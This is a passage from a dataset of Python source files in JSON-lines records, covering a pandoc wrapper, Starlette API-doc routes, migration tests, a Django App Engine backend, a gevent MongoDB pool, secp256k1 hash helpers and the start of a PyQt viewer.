return self\n\n def set_ext(self, ext: Ext) -> object:\n self.exts.append(ext)\n return self\n\n def set_no_ext(self, ext: Ext) -> object:\n self.no_exts.append(ext)\n return self\n\n def set_no_exts(self, exts: Iterable[Ext]) -> object:\n for ext in exts:\n self.set_no_ext(ext)\n return self\n\n @property\n def args(self) -> List[Text]:\n\n arguments = [\"pandoc\", \"--from\"]\n\n from_fmt = self.from_fmt._name_.lower()\n if len(self.exts) > 0:\n for ext in self.exts:\n from_fmt += f\"+{ext._name_.lower()}\"\n if len(self.no_exts) > 0:\n for ext in self.no_exts:\n from_fmt += f\"-{ext._name_.lower()}\"\n\n arguments.append(from_fmt)\n\n arguments.extend([\"--to\", self.to_fmt._name_.lower()])\n\n for opt in self.long_opts.keys():\n maybe_val: Optional[Text] = self.long_opts[opt]\n opt_name: Text = opt._name_.lower().replace(\"_\", \"-\")\n if maybe_val:\n arguments.append(f\"--{opt_name}={maybe_val}\")\n else:\n arguments.append(f\"--{opt_name}\")\n log.debug(f\"args: {arguments}\")\n return arguments\n\n def before(self, text: Text) -> Text:\n \"\"\"Fix badly formatted markdown where heading marker `#` is not\n followed by space.\n\n NOTE: This method is pure.\n\n :param text: input text before transformations\n :return: output text after transformations\n \"\"\"\n log.debug(\"preprocessing [before hook]\")\n return re.sub(r\"(#+)([A-Z])\", \"\\1 \\2\", text, re.MULTILINE)\n\n def after(self, text: Text) -> Text:\n \"\"\"Transform relative links and references, Inject JavaScript.\n\n NOTE: This method is pure.\n\n Match on either src or href e.g.:\n\n `src=\"./script.js\"` and `href=\"styles.css\"`\n\n skip over whitespace e.g.:\n\n `src=\" address/file.png\"`\n\n match if relative e.g.:\n\n `./`\n or match if not an external link with a protocol e.g.:\n\n `https://stackoverflow.com`\n\n or match if not a valid directory reference e.g.:\n\n `/srv/log/log.txt` and `~/file.txt`\n\n :param text: input text\n :return: output after transformations\n \"\"\"\n pat = re.compile(r'(href|src)=\"\\s*(\\./|(?![a-z]{2,10}://|~|\\#|/))')\n d: Text = dirname(self.input_file)\n with open(self.javascript) as f:\n log.debug(\"postprocessing [after hook]\")\n return re.sub(pat, f'\\\\1=\"{d}/', text).replace(\n \"\", f\"\"\n )\n\n def execute(self) -> Text:\n log.debug(\"executing\")\n with open(self.input_file, encoding=\"utf-8\") as input:\n return self.after(\n run(\n self.args,\n encoding=\"utf-8\",\n input=self.before(input.read()),\n stderr=DEVNULL,\n stdout=PIPE,\n ).stdout\n )\n\n\nif __name__ == \"__main__\":\n\n INPUT_FILE = sys.argv[1]\n\n log.debug(f\"input file: {INPUT_FILE}\")\n\n OUTPUT_FILE: Text = os.path.join(\n \"/tmp/vim\",\n basename(dirname(INPUT_FILE)),\n re.sub(\n r\"^(.*)\\.(?:r?md|m(?:ark)?down)$\",\n r\"\\1.html\",\n basename(INPUT_FILE),\n re.IGNORECASE | re.MULTILINE,\n ),\n )\n\n log.debug(f\"output file: {OUTPUT_FILE}\")\n\n ensure_exists(OUTPUT_FILE)\n\n with open(OUTPUT_FILE, \"w\", encoding=\"utf-8\") as output:\n cmd = PandocCmd(INPUT_FILE)\n output.write(cmd.execute())\n print(f\"Cmd: {' '.join(cmd.args)}\")\n print(f'Output: {output.name}')\n\n# vim:foldmethod=manual:\n"} {"ext": "py", "sha": "1a2f4e20d52fd7abc28470acbfa72929fc69b781", "content": "import logging\nfrom typing import Any, Dict, List, Optional\n\nfrom starlette.applications import Starlette\nfrom starlette.exceptions import HTTPException\nfrom starlette.requests import Request\nfrom starlette.responses import HTMLResponse, JSONResponse\nfrom starlette.routing import Mount, Route\n\nfrom pait.api_doc.html import get_redoc_html as _get_redoc_html\nfrom pait.api_doc.html import get_swagger_ui_html as _get_swagger_ui_html\nfrom pait.api_doc.open_api import PaitOpenApi\nfrom pait.field import Depends, Query\nfrom pait.g import config\nfrom pait.model.core import PaitCoreModel\nfrom pait.model.status import PaitStatus\n\nfrom ._load_app import load_app\nfrom ._pait import Pait\n\n\ndef add_doc_route(\n app: Starlette,\n scheme: Optional[str] = None,\n prefix: str = \"/\",\n pin_code: str = \"\",\n title: str = \"Pait Doc\",\n open_api_tag_list: Optional[List[Dict[str, Any]]] = None,\n) -> None:\n if pin_code:\n logging.info(f\"doc route start pin code:{pin_code}\")\n\n doc_pait: Pait = Pait(\n author=config.author or (\"so1n\",),\n status=config.status or PaitStatus.release,\n tag=(\"pait_doc\",),\n group=\"pait_doc\",\n )\n\n def _get_request_pin_code(r_pin_code: str = Query.i(\"\", alias=\"pin_code\")) -> Optional[str]:\n if pin_code:\n if r_pin_code != pin_code:\n raise HTTPException(\n status_code=404,\n detail=(\n \"The requested URL was not found on the server. If you entered\"\n \" the URL manually please check your spelling and try again.\"\n ),\n )\n return r_pin_code\n\n def _get_open_json_url(request: Request, r_pin_code: str) -> str:\n openapi_json_url: str = f\"{'/'.join(request.url.path.split('/')[:-1])}/openapi.json\"\n if r_pin_code:\n openapi_json_url += f\"?pin_code={r_pin_code}\"\n return openapi_json_url\n\n @doc_pait()\n def get_redoc_html(request: Request, r_pin_code: str = Depends.i(_get_request_pin_code)) -> HTMLResponse:\n return HTMLResponse(_get_redoc_html(_get_open_json_url(request, r_pin_code), title))\n\n @doc_pait()\n def get_swagger_ui_html(request: Request, r_pin_code: str = Depends.i(_get_request_pin_code)) -> HTMLResponse:\n return HTMLResponse(_get_swagger_ui_html(_get_open_json_url(request, r_pin_code), title))\n\n @doc_pait(pre_depend_list=[_get_request_pin_code])\n def openapi_route(request: Request) -> JSONResponse:\n pait_dict: Dict[str, PaitCoreModel] = load_app(request.app)\n _scheme: str = scheme or request.url.scheme\n pait_openapi: PaitOpenApi = PaitOpenApi(\n pait_dict,\n title=title,\n open_api_server_list=[{\"url\": f\"{_scheme}://{request.url.hostname}:{request.url.port}\", \"description\": \"\"}],\n open_api_tag_list=open_api_tag_list,\n )\n return JSONResponse(pait_openapi.open_api_dict)\n\n route: Mount = Mount(\n prefix,\n name=\"api doc\",\n routes=[\n Route(\"/redoc\", get_redoc_html, methods=[\"GET\"]),\n Route(\"/swagger\", get_swagger_ui_html, methods=[\"GET\"]),\n Route(\"/openapi.json\", openapi_route, methods=[\"GET\"]),\n ],\n )\n app.routes.append(route)\n"} {"ext": "py", "sha": "1a2f4e390d7cb44e171aa0da52f9bab0974dc7d5", "content": "import hashlib\nimport io\nimport json\nimport tempfile\nfrom random import randint\nfrom unittest.mock import Mock\n\nimport pytest\nimport requests\n\nfrom .shared import (\n guess_mimetype,\n HashWrap,\n MogileFile,\n encode_int,\n future_waiter,\n make_bucket_map,\n maybe_update_max,\n md5_fileobj_b64,\n md5_fileobj_hex,\n sha1_fileobj_b64,\n sha1_fileobj_hex,\n)\n\n\n# pylint: disable=C0115,C0116,R0201\nclass TestMigrate:\n MD5_HEX = \"5eb63bbbe01eeed093cb22bb8f5acdc3\"\n SHA1_HEX = \"2aae6c35c94fcfb415dbe95f408b9ce91ee846ed\"\n MD5_B64 = \"XrY7u+Ae7tCTyyK7j1rNww==\"\n SHA1_B64 = \"Kq5sNclPz7QV2+lfQIuc6R7oRu0=\"\n\n @pytest.fixture\n def mogile_client(self):\n mogile_client = Mock()\n paths = Mock()\n mogile_client.get_paths.return_value = paths\n paths.data = {\"paths\": {1: \"http://example.org/1\", 2: \"http://example.org/2\"}}\n return mogile_client\n\n @pytest.fixture\n def gcs_client(self):\n gcs_client = Mock()\n bucket = Mock()\n blob = Mock()\n gcs_client.get_bucket.return_value = bucket\n bucket.get_blob.return_value = blob\n bucket.blob.return_value = blob\n return gcs_client\n\n @pytest.fixture\n def row(self):\n # hello world sha1sum: 2aae6c35c94fcfb415dbe95f408b9ce91ee846ed\n # (fid, dmid, dkey, length, classid, devcount)\n return [1, 1, f\"{self.SHA1_HEX}-mogilefs-prod-repo\", 1593790, 0, 2]\n\n @pytest.yield_fixture\n def my_tempfile(self):\n with tempfile.TemporaryFile() as tmp:\n tmp.write(b\"hello world\")\n yield tmp\n\n @pytest.fixture\n def mogile_file(self):\n return MogileFile(dkey=f\"{self.SHA1_HEX}-repo\", fid=564879786, length=1)\n\n def test_parse_row(self, row):\n file = MogileFile.parse_row(row)\n assert file.sha1sum == self.SHA1_HEX\n assert file.fid == 1\n assert file.length == 1593790\n assert file.dkey == f\"{self.SHA1_HEX}-mogilefs-prod-repo\"\n assert file.skip is False\n assert file.mogile_bucket == \"mogilefs-prod-repo\"\n\n def test_parse_bad_dmid(self, row):\n row[1] = 2\n with pytest.raises(AssertionError, match=\"Bad domain\"):\n MogileFile.parse_row(row)\n\n def test_parse_temp_file(self, row):\n row[2] = \"8d26b4da-bd3e-47eb-888a-13bb3579c7e9.tmp\"\n file = MogileFile.parse_row(row)\n assert file.skip is True\n assert file.mogile_bucket is None\n assert file.sha1sum is None\n\n def test_parse_bad_class(self, row):\n row[4] = 1\n with pytest.raises(AssertionError, match=\"Bad class\"):\n MogileFile.parse_row(row)\n\n def test_make_intermediary_key(self, mogile_file):\n assert mogile_file.make_intermediary_key() == \"0/564/879/0564879786.fid\"\n\n def test_make_contentrepo_key(self, mogile_file):\n assert mogile_file.make_contentrepo_key() == self.SHA1_HEX\n\n def test_exists_in_bucket(self, mogile_file, gcs_client):\n blob = gcs_client.get_bucket().get_blob()\n blob.size = 1\n blob.md5_hash = self.MD5_HEX\n assert (\n mogile_file.exists_in_bucket(gcs_client, \"my-bucket\", \"my-key\")\n == self.MD5_HEX\n )\n\n def test_does_not_exist_in_bucket(self, gcs_client, mogile_file):\n gcs_client.get_bucket().get_blob.return_value = None\n assert mogile_file.exists_in_bucket(gcs_client, \"my-bucket\", \"my-file\") is False\n\n def test_mogile_file_to_json(self, mogile_file):\n assert mogile_file == MogileFile.from_json(json.loads(mogile_file.to_json()))\n\n def test_md5_fileobj(self, my_tempfile):\n assert md5_fileobj_hex(my_tempfile) == self.MD5_HEX\n assert md5_fileobj_b64(my_tempfile) == self.MD5_B64\n\n def test_sha1_fileobj(self, my_tempfile):\n assert sha1_fileobj_hex(my_tempfile) == self.SHA1_HEX\n assert sha1_fileobj_b64(my_tempfile) == self.SHA1_B64\n\n def test_put(\n self, mogile_file: MogileFile, mogile_client, gcs_client, requests_mock\n ):\n requests_mock.get(\"http://example.org/1\", content=b\"hello world\")\n requests_mock.get(\"http://example.org/2\", content=b\"hello world\")\n blob = gcs_client.get_bucket().get_blob()\n\n def upload_from_file(fileobj, *args, **kwargs):\n fileobj.read()\n\n blob.upload_from_file.side_effect = upload_from_file\n blob.upload_from_file.return_value = \"xyz\"\n blob.md5_hash = self.MD5_B64\n md5 = mogile_file.put(mogile_client, gcs_client, \"my-bucket\")\n assert md5 == self.MD5_B64\n\n def test_make_bucket_map(self):\n assert make_bucket_map(\"a:b,c:d\") == {\"a\": \"b\", \"c\": \"d\"}\n\n def test_future_waiter(self):\n futures_list = []\n called_times = {}\n for i in range(0, 100):\n future = Mock()\n future.exception.return_value = None\n\n def mk_done(counter):\n called_times[counter] = 0\n return_after = counter % 3\n\n def done():\n called_times[counter] += 1\n return called_times[counter] > return_after\n\n return done\n\n future.done = mk_done(i)\n future.result.return_value = None\n futures_list.append(future)\n passthrough = future_waiter((f for f in futures_list), 10)\n leftovers = list(iter(passthrough))\n assert leftovers == [None] * 100\n\n def test_future_waiter_exception(self):\n with pytest.raises(Exception, match=\"huh\"):\n futures_list = []\n for i in range(0, 10):\n future = Mock()\n future.exception.return_value = None\n future.done.return_value = True\n future.result.return_value = None\n if i == 5:\n future.exception.return_value = Exception(\"huh\")\n futures_list.append(future)\n\n passthrough = future_waiter((f for f in futures_list), 10)\n leftovers = list(iter(passthrough))\n\n def test_hash_wrap(self):\n bio = io.BytesIO(b\"hello world\")\n md5 = hashlib.md5()\n with HashWrap(bio, md5) as pipe:\n assert pipe.read() == b\"hello world\"\n assert md5.hexdigest() == \"5eb63bbbe01eeed093cb22bb8f5acdc3\"\n\n def test_hash_wrap_requests(self, requests_mock):\n requests_mock.get(\"http://example.org/1\", content=b\"hello world\")\n with requests.get(\"http://example.org/1\", stream=True) as req:\n req.raise_for_status()\n sha1 = hashlib.sha1()\n req.raw.decode_content = True\n with HashWrap(req.raw, sha1) as pipe:\n assert \"hello world\" == pipe.read().decode(\"utf-8\")\n assert sha1.hexdigest() == \"2aae6c35c94fcfb415dbe95f408b9ce91ee846ed\"\n\n def test_encode_int(self):\n assert b\"100\" == encode_int(100)\n i = randint(0, 100000000000)\n assert i == int(encode_int(i))\n\n def test_maybe_update_max(self):\n db = {}\n maybe_update_max(db, \"last\", 1)\n assert db[\"last\"] == b\"1\"\n\n db = {\"last\": b\"1\"}\n maybe_update_max(db, \"last\", 2)\n assert db[\"last\"] == b\"2\"\n\n db = {\"last\": b\"2\"}\n maybe_update_max(db, \"last\", 1)\n assert db[\"last\"] == b\"2\"\n\n def test_guess_mimetype(self):\n assert \"image/png\" == guess_mimetype(\n \"corpus-dev-0242ac130003/10.1371/image.pbio.v01.i01/1/image.pbio.v01.i01.g001.PNG_I\"\n )\n assert \"image/png\" == guess_mimetype(\n \"gs:///corpus-dev-0242ac130003/10.1371/image.pbio.v01.i01/1/image.pbio.v01.i01.g001.PNG_I\"\n )\n assert \"image/png\" == guess_mimetype(\"image.pbio.v01.i01.g001.PNG_I\")\n assert \"image/png\" == guess_mimetype(\"image.pbio.v01.i01.g001.PNG\")\n assert \"image/png\" == guess_mimetype(\"image.pbio.v01.i01.g001.PNG_I\")\n assert \"application/octet-stream\" == guess_mimetype(\"foo\")\n assert \"text/csv\" == guess_mimetype(\"foo.csv\")\n assert \"text/html\" == guess_mimetype(\"foo.html\")\n"} {"ext": "py", "sha": "1a2f4ea64c703fedcd44794e9fafec9ff20acd56", "content": "# coding: utf-8\n\n\"\"\"\n YNAB API Endpoints\n\n Our API uses a REST based design, leverages the JSON data format, and relies upon HTTPS for transport. We respond with meaningful HTTP response codes and if an error occurs, we include error details in the response body. API Documentation is at https://api.youneedabudget.com # noqa: E501\n\n OpenAPI spec version: 1.0.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nimport ynab_moka\nfrom ynab_moka.api.scheduled_transactions_api import ScheduledTransactionsApi # noqa: E501\nfrom ynab_moka.rest import ApiException\n\n\nclass TestScheduledTransactionsApi(unittest.TestCase):\n \"\"\"ScheduledTransactionsApi unit test stubs\"\"\"\n\n def setUp(self):\n self.api = ynab_moka.api.scheduled_transactions_api.ScheduledTransactionsApi() # noqa: E501\n\n def tearDown(self):\n pass\n\n def test_get_scheduled_transaction_by_id(self):\n \"\"\"Test case for get_scheduled_transaction_by_id\n\n Single scheduled transaction # noqa: E501\n \"\"\"\n pass\n\n def test_get_scheduled_transactions(self):\n \"\"\"Test case for get_scheduled_transactions\n\n List scheduled transactions # noqa: E501\n \"\"\"\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a2f4f23daa5ac8ae414785f7aaf8ca3a86222bb", "content": "from ..boot import DATA_ROOT\nfrom ..utils import appid, on_production_server\nfrom .creation import DatabaseCreation\nfrom .stubs import stub_manager\nfrom django.db.backends.util import format_number\nfrom djangotoolbox.db.base import NonrelDatabaseFeatures, \\\n NonrelDatabaseOperations, NonrelDatabaseWrapper, NonrelDatabaseClient, \\\n NonrelDatabaseValidation, NonrelDatabaseIntrospection\nfrom google.appengine.ext.db.metadata import get_kinds, get_namespaces\nfrom google.appengine.api.datastore import Query, Delete\nfrom google.appengine.api.namespace_manager import set_namespace\nimport logging\nimport os\n\nDATASTORE_PATHS = {\n 'datastore_path': os.path.join(DATA_ROOT, 'datastore'),\n 'blobstore_path': os.path.join(DATA_ROOT, 'blobstore'),\n 'rdbms_sqlite_path': os.path.join(DATA_ROOT, 'rdbms'),\n 'prospective_search_path': os.path.join(DATA_ROOT, 'prospective-search'),\n}\n\ndef get_datastore_paths(options):\n paths = {}\n for key, path in DATASTORE_PATHS.items():\n paths[key] = options.get(key, path)\n return paths\n\ndef destroy_datastore(paths):\n \"\"\"Destroys the appengine datastore at the specified paths.\"\"\"\n for path in paths.values():\n if not path:\n continue\n try:\n os.remove(path)\n except OSError, error:\n if error.errno != 2:\n logging.error(\"Failed to clear datastore: %s\" % error)\n\nclass DatabaseFeatures(NonrelDatabaseFeatures):\n allows_primary_key_0 = True\n supports_dicts = True\n\nclass DatabaseOperations(NonrelDatabaseOperations):\n compiler_module = __name__.rsplit('.', 1)[0] + '.compiler'\n\n DEFAULT_MAX_DIGITS = 16\n\n def value_to_db_decimal(self, value, max_digits, decimal_places):\n if value is None:\n return None\n sign = value < 0 and u'-' or u''\n if sign: \n value = abs(value)\n if max_digits is None: \n max_digits = self.DEFAULT_MAX_DIGITS\n\n if decimal_places is None:\n value = unicode(value)\n else:\n value = format_number(value, max_digits, decimal_places)\n decimal_places = decimal_places or 0\n n = value.find('.')\n\n if n < 0:\n n = len(value)\n if n < max_digits - decimal_places:\n value = u\"0\" * (max_digits - decimal_places - n) + value\n return sign + value\n\n def sql_flush(self, style, tables, sequences):\n self.connection.flush()\n return []\n\nclass DatabaseClient(NonrelDatabaseClient):\n pass\n\nclass DatabaseValidation(NonrelDatabaseValidation):\n pass\n\nclass DatabaseIntrospection(NonrelDatabaseIntrospection):\n def table_names(self):\n \"\"\"Returns a list of names of all tables that exist in the database.\"\"\"\n return [kind.key().name() for kind in Query(kind='__kind__').Run()]\n\nclass DatabaseWrapper(NonrelDatabaseWrapper):\n def __init__(self, *args, **kwds):\n super(DatabaseWrapper, self).__init__(*args, **kwds)\n self.features = DatabaseFeatures(self)\n self.ops = DatabaseOperations(self)\n self.client = DatabaseClient(self)\n self.creation = DatabaseCreation(self)\n self.validation = DatabaseValidation(self)\n self.introspection = DatabaseIntrospection(self)\n options = self.settings_dict\n self.remote_app_id = options.get('REMOTE_APP_ID', appid)\n self.domain = options.get('DOMAIN', 'appspot.com')\n self.remote_api_path = options.get('REMOTE_API_PATH', None)\n self.secure_remote_api = options.get('SECURE_REMOTE_API', True)\n\n remote = options.get('REMOTE', False)\n if on_production_server:\n remote = False\n if remote:\n stub_manager.setup_remote_stubs(self)\n else:\n stub_manager.setup_stubs(self)\n\n def flush(self):\n \"\"\"Helper function to remove the current datastore and re-open the stubs\"\"\"\n if stub_manager.active_stubs == 'remote':\n import random\n import string\n code = ''.join([random.choice(string.ascii_letters) for x in range(4)])\n print '\\n\\n!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'\n print '!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'\n print \"Warning! You're about to delete the *production* datastore!\"\n print 'Only models defined in your INSTALLED_APPS can be removed!'\n print 'If you want to clear the whole datastore you have to use the ' \\\n 'datastore viewer in the dashboard. Also, in order to delete all '\\\n 'unneeded indexes you have to run appcfg.py vacuum_indexes.'\n print 'In order to proceed you have to enter the following code:'\n print code\n response = raw_input('Repeat: ')\n if code == response:\n print 'Deleting...'\n delete_all_entities()\n print \"Datastore flushed! Please check your dashboard's \" \\\n 'datastore viewer for any remaining entities and remove ' \\\n 'all unneeded indexes with manage.py vacuum_indexes.'\n else:\n print 'Aborting'\n exit()\n elif stub_manager.active_stubs == 'test':\n stub_manager.deactivate_test_stubs()\n stub_manager.activate_test_stubs()\n else:\n destroy_datastore(get_datastore_paths(self.settings_dict))\n stub_manager.setup_local_stubs(self)\n\ndef delete_all_entities():\n for namespace in get_namespaces():\n set_namespace(namespace)\n for kind in get_kinds():\n if kind.startswith('__'):\n continue\n while True:\n data = Query(kind=kind, keys_only=True).Get(200)\n if not data:\n break\n Delete(data)"} {"ext": "py", "sha": "1a2f4f50819b315f2c0f7883438652987d3e892e", "content": "# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import annotations\n\nimport itertools\n\nfrom pants.backend.python.goals import lockfile\nfrom pants.backend.python.goals.lockfile import GeneratePythonLockfile\nfrom pants.backend.python.subsystems.python_tool_base import PythonToolBase\nfrom pants.backend.python.subsystems.setup import PythonSetup\nfrom pants.backend.python.target_types import ConsoleScript, InterpreterConstraintsField\nfrom pants.backend.python.util_rules.interpreter_constraints import InterpreterConstraints\nfrom pants.core.goals.generate_lockfiles import GenerateToolLockfileSentinel\nfrom pants.engine.rules import Get, collect_rules, rule\nfrom pants.engine.target import AllTargets, AllTargetsRequest\nfrom pants.engine.unions import UnionRule\nfrom pants.util.docutil import git_url\nfrom pants.util.logging import LogLevel\n\n\nclass IPython(PythonToolBase):\n options_scope = \"ipython\"\n help = \"The IPython enhanced REPL (https://ipython.org/).\"\n\n default_version = \"ipython==7.16.1\" # The last version to support Python 3.6.\n default_main = ConsoleScript(\"ipython\")\n\n register_lockfile = True\n default_lockfile_resource = (\"pants.backend.python.subsystems\", \"ipython_lockfile.txt\")\n default_lockfile_path = \"src/python/pants/backend/python/subsystems/ipython_lockfile.txt\"\n default_lockfile_url = git_url(default_lockfile_path)\n\n @classmethod\n def register_options(cls, register):\n super().register_options(register)\n register(\n \"--ignore-cwd\",\n type=bool,\n advanced=True,\n default=True,\n help=\"Whether to tell IPython not to put the CWD on the import path.\\n\\n\"\n \"Normally you want this to be True, so that imports come from the hermetic \"\n \"environment Pants creates.\\n\\nHowever IPython<7.13.0 doesn't support this option, \"\n \"so if you're using an earlier version (e.g., because you have Python 2.7 code) \"\n \"then you will need to set this to False, and you may have issues with imports \"\n \"from your CWD shading the hermetic environment.\",\n )\n\n\nclass IPythonLockfileSentinel(GenerateToolLockfileSentinel):\n resolve_name = IPython.options_scope\n\n\n@rule(\n desc=(\n \"Determine all Python interpreter versions used by iPython in your project (for lockfile \"\n \"usage)\"\n ),\n level=LogLevel.DEBUG,\n)\nasync def setup_ipython_lockfile(\n _: IPythonLockfileSentinel, ipython: IPython, python_setup: PythonSetup\n) -> GeneratePythonLockfile:\n if not ipython.uses_lockfile:\n return GeneratePythonLockfile.from_tool(ipython)\n\n # IPython is often run against the whole repo (`./pants repl ::`), but it is possible to run\n # on subsets of the codebase with disjoint interpreter constraints, such as\n # `./pants repl py2::` and then `./pants repl py3::`. Still, even with those subsets possible,\n # we need a single lockfile that works with all possible Python interpreters in use.\n #\n # This ORs all unique interpreter constraints. The net effect is that every possible Python\n # interpreter used will be covered.\n all_tgts = await Get(AllTargets, AllTargetsRequest())\n unique_constraints = {\n InterpreterConstraints.create_from_compatibility_fields(\n [tgt[InterpreterConstraintsField]], python_setup\n )\n for tgt in all_tgts\n if tgt.has_field(InterpreterConstraintsField)\n }\n constraints = InterpreterConstraints(itertools.chain.from_iterable(unique_constraints))\n return GeneratePythonLockfile.from_tool(\n ipython, constraints or InterpreterConstraints(python_setup.interpreter_constraints)\n )\n\n\ndef rules():\n return (\n *collect_rules(),\n *lockfile.rules(),\n UnionRule(GenerateToolLockfileSentinel, IPythonLockfileSentinel),\n )\n"} {"ext": "py", "sha": "1a2f4f774438953a0317b8d2432ecb4bd54a4d42", "content": "import os\n\nfrom acres.model import topic_list\n\n\ndef test_parse():\n topics = topic_list.parse(\"tests/resources/test_topics.tsv\")\n types = topic_list.unique_types(topics)\n assert 'EKG' in types\n\n\ndef test_create_topic_list(ngramstat):\n filename = \"tests/resources/ngram_topics.tsv\"\n topic_list.create(filename, 1.0, 3)\n assert os.path.exists(filename)\n assert os.path.getsize(filename) > 10\n"} {"ext": "py", "sha": "1a2f4f86bc4e5affbf717e120dd623459b963145", "content": "# Copyright 2011 10gen\n# \n# Modified by Antonin Amand to work with gevent.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport os\nimport pymongo.connection\nfrom gevent.hub import getcurrent\nimport gevent.queue\nimport gevent.greenlet\nimport gevent.local\nimport gevent.coros\nfrom gevent import socket\nimport weakref\n\n\nclass Pool(object):\n \"\"\" A greenlet safe connection pool for gevent (non-thread safe).\n \"\"\"\n\n DEFAULT_TIMEOUT = 3.0\n\n def __init__(self, pool_size, network_timeout=None):\n self.network_timeout = network_timeout or self.DEFAULT_TIMEOUT\n self.pool_size = pool_size\n self._bootstrap(os.getpid())\n self._lock = gevent.coros.RLock()\n\n def _bootstrap(self, pid):\n self._count = 0\n self._pid = pid\n self._used = {}\n self._queue = gevent.queue.Queue(self.pool_size)\n\n def connect(self, host, port):\n \"\"\"Connect to Mongo and return a new (connected) socket.\n \"\"\"\n try:\n # Prefer IPv4. If there is demand for an option\n # to specify one or the other we can add it later.\n s = socket.socket(socket.AF_INET)\n s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n s.settimeout(self.network_timeout or \n pymongo.connection._CONNECT_TIMEOUT)\n s.connect((host, port))\n s.settimeout(self.network_timeout)\n return s\n except socket.gaierror:\n # If that fails try IPv6\n s = socket.socket(socket.AF_INET6)\n s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n s.settimeout(self.network_timeout or \n pymongo.connection._CONNECT_TIMEOUT)\n s.connect((host, port))\n s.settimeout(self.network_timeout)\n return s\n\n def get_socket(self, host, port):\n pid = os.getpid()\n if pid != self._pid:\n self._bootstrap(pid)\n\n greenlet = getcurrent()\n from_pool = True\n sock = self._used.get(greenlet)\n if sock is None:\n with self._lock:\n if self._count < self.pool_size:\n self._count += 1\n from_pool = False\n sock = self.connect(host, port)\n if sock is None:\n from_pool = True\n sock = self._queue.get(timeout=self.network_timeout)\n\n if isinstance(greenlet, gevent.Greenlet):\n greenlet.link(self._return)\n self._used[greenlet] = sock\n else:\n ref = weakref.ref(greenlet, self._return)\n self._used[ref] = sock\n return sock, from_pool\n\n def return_socket(self):\n greenlet = getcurrent()\n self._return(greenlet)\n\n def _return(self, greenlet):\n try:\n sock = self._used.get(greenlet)\n if sock is not None:\n del self._used[greenlet]\n self._queue.put(sock)\n except:\n with self._lock:\n self._count -= 1\n\n\ndef patch():\n import pymongo.connection\n pymongo.connection._Pool = Pool\n\n"} {"ext": "py", "sha": "1a2f4f92a113636a896106383cfcf97573818685", "content": "from buidl._libsec import ffi, lib\n\n\nGLOBAL_CTX = ffi.gc(\n lib.secp256k1_context_create(\n lib.SECP256K1_CONTEXT_SIGN | lib.SECP256K1_CONTEXT_VERIFY\n ),\n lib.secp256k1_context_destroy,\n)\n\n\ndef tagged_hash(tag, msg):\n result = ffi.new(\"unsigned char [32]\")\n tag_length = len(tag)\n msg_length = len(msg)\n if not lib.secp256k1_tagged_sha256(\n GLOBAL_CTX,\n result,\n tag,\n tag_length,\n msg,\n msg_length,\n ):\n raise RuntimeError(\"libsecp256k1 tagged hash problem\")\n return bytes(ffi.buffer(result, 32))\n\n\ndef hash_aux(msg):\n return tagged_hash(b\"BIP0340/aux\", msg)\n\n\ndef hash_challenge(msg):\n return tagged_hash(b\"BIP0340/challenge\", msg)\n\n\ndef hash_keyaggcoef(msg):\n return tagged_hash(b\"KeyAgg coefficient\", msg)\n\n\ndef hash_keyagglist(msg):\n return tagged_hash(b\"KeyAgg list\", msg)\n\n\ndef hash_musignonce(msg):\n return tagged_hash(b\"MuSig/noncecoef\", msg)\n\n\ndef hash_nonce(msg):\n return tagged_hash(b\"BIP0340/nonce\", msg)\n\n\ndef hash_tapbranch(msg):\n return tagged_hash(b\"TapBranch\", msg)\n\n\ndef hash_tapleaf(msg):\n return tagged_hash(b\"TapLeaf\", msg)\n\n\ndef hash_tapsighash(msg):\n return tagged_hash(b\"TapSighash\", msg)\n\n\ndef hash_taptweak(msg):\n return tagged_hash(b\"TapTweak\", msg)\n"} {"ext": "py", "sha": "1a2f4f94f3c75c8f9e9d1fa2053fef78511e680e", "content": "from PyQt5 import QtWidgets\nfrom PyQt5.QtCore import QObject, pyqtSlot, pyqtSignal, QLocale, Qt\nfrom PyQt5.QtWidgets import QPushButton, QLabel\nfrom PyQt5.QtGui import QIcon, QPixmap\nimport sys\n\nfrom pymodaq.daq_utils.parameter import utils as putils\nfrom pymodaq.daq_measurement.daq_measurement_main import DAQ_Measurement\nfrom collections import OrderedDict\nfrom pymodaq.daq_utils.plotting.crosshair import Crosshair\nimport pyqtgraph as pg\nimport numpy as np\nfrom pymodaq.daq_utils import daq_utils as utils\nfrom pymodaq.daq_utils.gui_utils import QAction\nfrom pymodaq.daq_utils.plotting.viewer1D.viewer1Dbasic import Viewer1DBasic\nfrom pymodaq.daq_utils.managers.roi_manager import ROIManager\nimport datetime\n\nlogger = utils.set_logger(utils.get_module_name(__file__))\n\n\nclass Viewer1D(QtWidgets.QWidget, QObject):\n \"\"\"this plots 1D data on a plotwidget. Math and measurement can be done on it. Datas and measurements are then exported with the signal\n data_to_export_signal\n \"\"\"\n\n data_to_export_signal = pyqtSignal(OrderedDict) # self.data_to_export=edict(data0D=None,data1D=None,data2D=None)\n math_signal = pyqtSignal(OrderedDict) # OrderedDict:=[x_axis=...,data=...,ROI_bounds=...,operation=]\n ROI_changed = pyqtSignal()\n ROI_changed_finished = pyqtSignal()\n\n def __init__(self, parent=None):\n QLocale.setDefault(QLocale(QLocale.English, QLocale.UnitedStates))\n super(Viewer1D, self).__init__()\n\n self.viewer_type = 'Data1D'\n self.title = 'viewer1D'\n if parent is None:\n parent = QtWidgets.QWidget()\n self.parent = parent\n\n self.roi_manager = ROIManager('1D')\n 